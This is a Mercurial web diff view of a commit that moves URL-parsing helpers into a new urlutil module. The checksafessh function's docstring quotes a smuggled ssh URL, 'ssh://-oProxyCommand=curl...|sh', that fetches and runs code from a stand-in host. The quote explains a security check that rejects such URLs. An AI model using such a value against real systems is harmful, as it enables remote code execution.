Mercurial > public > mercurial-scm > hg
comparison mercurial/utils/urlutil.py @ 46907:ffd3e823a7e5
urlutil: extract `url` related code from `util` into the new module
The new module is a good fit for this code, and the move will make it easier
for the gathered code to work together later.
Differential Revision: https://phab.mercurial-scm.org/D10374
author | Pierre-Yves David <pierre-yves.david@octobus.net> |
---|---|
date | Mon, 12 Apr 2021 03:01:04 +0200 |
parents | 33524c46a092 |
children | 4452cb788404 |
comparison
equal
deleted
inserted
replaced
46906:33524c46a092 | 46907:ffd3e823a7e5 |
---|---|
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others | 3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others |
4 # | 4 # |
5 # This software may be used and distributed according to the terms of the | 5 # This software may be used and distributed according to the terms of the |
6 # GNU General Public License version 2 or any later version. | 6 # GNU General Public License version 2 or any later version. |
7 import os | 7 import os |
8 import re as remod | |
9 import socket | |
8 | 10 |
9 from ..i18n import _ | 11 from ..i18n import _ |
10 from ..pycompat import ( | 12 from ..pycompat import ( |
11 getattr, | 13 getattr, |
12 setattr, | 14 setattr, |
13 ) | 15 ) |
14 from .. import ( | 16 from .. import ( |
17 encoding, | |
15 error, | 18 error, |
16 pycompat, | 19 pycompat, |
17 util, | 20 urllibcompat, |
18 ) | 21 ) |
22 | |
23 | |
24 if pycompat.TYPE_CHECKING: | |
25 from typing import ( | |
26 Union, | |
27 ) | |
28 | |
29 urlreq = urllibcompat.urlreq | |
30 | |
31 | |
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Resolve ``port`` to a numeric port.

    Any value that ``int()`` can convert is converted and returned
    directly. Otherwise the value is treated as a service name and
    looked up with socket.getservbyname(); error.Abort is raised when
    that lookup fails.
    """
    try:
        number = int(port)
    except ValueError:
        # not numeric: fall through to the service-name lookup
        pass
    else:
        return number

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        message = _(b"no port number associated with service '%s'") % port
        raise error.Abort(message)
51 | |
52 | |
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted when serializing user and password
    _safechars = b"!~*'()+"
    # characters left unquoted when serializing path and fragment
    _safepchars = b"/!~*'()+:\\"
    # matches a leading "<scheme>:" prefix
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        """Parse ``path`` into URL components.

        ``parsequery`` and ``parsefragment`` control whether the query
        string and the fragment are split off from the path.

        Raises error.Abort for a ``file://`` URL whose host is not one of
        localhost, 127.0.0.1 or [::1].
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new url object carrying the same components as this one."""
        # The constructor argument is a throwaway: every attribute set by
        # __init__ is overwritten below.
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # the port must be carried over too, otherwise the copy serializes
        # without its explicit port
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        """Show every component that is not None, in URL order."""
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # local paths (and bundle paths) are emitted without any quoting
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            # a drive-letter path needs a third slash: file:///c:/...
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # bracketed (IPv6) hosts are emitted verbatim
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authinfo)`` with credentials split out of the URL.

        ``url`` is this URL serialized without user and password. The
        second item is None when no user is set; otherwise it is the tuple
        ``(None, (url, host), user, passwd)``, with ``passwd`` replaced by
        ``b''`` when unset.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily drop the credentials so bytes() omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Return True when this URL or path counts as absolute."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the path to use for local access.

        For ``file`` and ``bundle`` URLs this is derived from the parsed
        components; for anything else the string originally passed to the
        constructor is returned unchanged.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
396 | |
397 | |
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` parses as a URL with a non-empty scheme."""
    parsed = url(path)
    # cast to help pytype
    return bool(parsed.scheme)
401 | |
402 | |
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with a drive letter such as ``c:``.

    Empty or None input yields False.
    """
    if not path:
        return False
    letter, separator = path[0:1], path[1:2]
    return separator == b':' and letter.isalpha()
406 | |
407 | |
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for ``path``.

    The value is parsed as a url with query and fragment parsing turned
    off, and the parsed object's localpath() is returned.
    """
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
411 | |
412 | |
def checksafessh(path):
    # type: (bytes) -> None
    """Reject ssh urls that could smuggle an option to ssh (SEC).

    ssh parses the first item as an option, so a url such as
    ssh://-oProxyCommand=curl${IFS}bad.server|sh/path can be used as an
    exploit. The check is done on the unquoted form of ``path``, for
    both the ``ssh://`` and ``svn+ssh://`` schemes.

    Raises an error.Abort when the url is unsafe.
    """
    unquoted = urlreq.unquote(path)
    unsafeprefixes = (b'ssh://-', b'svn+ssh://-')
    if not unquoted.startswith(unsafeprefixes):
        return
    raise error.Abort(
        _(b'potentially unsafe url: %r') % (pycompat.bytestr(unquoted),)
    )
429 | |
430 | |
def hidepassword(u):
    # type: (bytes) -> bytes
    """Return the url string ``u`` with a non-empty password shown as ``***``."""
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438 | |
439 | |
def removeauth(u):
    # type: (bytes) -> bytes
    """Return the url string ``u`` with user and password stripped."""
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
19 | 446 |
20 | 447 |
21 class paths(dict): | 448 class paths(dict): |
22 """Represents a collection of paths and their configs. | 449 """Represents a collection of paths and their configs. |
23 | 450 |
101 return register | 528 return register |
102 | 529 |
103 | 530 |
104 @pathsuboption(b'pushurl', b'pushloc') | 531 @pathsuboption(b'pushurl', b'pushloc') |
105 def pushurlpathoption(ui, path, value): | 532 def pushurlpathoption(ui, path, value): |
106 u = util.url(value) | 533 u = url(value) |
107 # Actually require a URL. | 534 # Actually require a URL. |
108 if not u.scheme: | 535 if not u.scheme: |
109 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) | 536 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) |
110 return None | 537 return None |
111 | 538 |
146 """ | 573 """ |
147 if not rawloc: | 574 if not rawloc: |
148 raise ValueError(b'rawloc must be defined') | 575 raise ValueError(b'rawloc must be defined') |
149 | 576 |
150 # Locations may define branches via syntax <base>#<branch>. | 577 # Locations may define branches via syntax <base>#<branch>. |
151 u = util.url(rawloc) | 578 u = url(rawloc) |
152 branch = None | 579 branch = None |
153 if u.fragment: | 580 if u.fragment: |
154 branch = u.fragment | 581 branch = u.fragment |
155 u.fragment = None | 582 u.fragment = None |
156 | 583 |